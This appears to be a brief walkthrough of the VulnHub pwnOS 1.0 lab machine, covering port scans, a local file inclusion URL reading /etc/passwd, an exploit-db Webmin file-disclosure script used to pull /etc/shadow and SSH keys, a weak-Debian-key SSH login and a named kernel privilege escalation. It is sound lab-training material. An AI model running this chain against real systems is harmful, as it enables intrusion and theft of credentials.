source: https://www.vulnhub.com/entry/pwnos-10,33/
192.168.1.6
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
10000/tcp open http MiniServ 0.01 (Webmin httpd)
maybe ubuntu 7.10
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index2 (Status: 200)
/index1 (Status: 200)
/index2.php (Status: 200)
/index.php (Status: 200)
/php (Status: 301)
local file inclusion:
http://192.168.1.6/index1.php?help=false&connect=../../../../etc/passwd
samba 3.0.26a
https://www.exploit-db.com/exploits/2017
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)
perl ./2017.pl 192.168.1.6 10000 /etc/issue 0
perl ./2017.pl 192.168.1.6 10000 /etc/passwd 0
perl ./2017.pl 192.168.1.6 10000 /etc/shadow 0
perl ./2017.pl 192.168.1.6 10000 /home/obama/.ssh/authorized_keys 0
https://github.com/g0tmi1k/debian-ssh
ssh -i ./common_keys/rsa/2048/dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.1.6
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
DISTRIB_DESCRIPTION="Ubuntu 7.10"
https://www.exploit-db.com/exploits/8478
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Local Privilege Escalation
No comments:
Post a Comment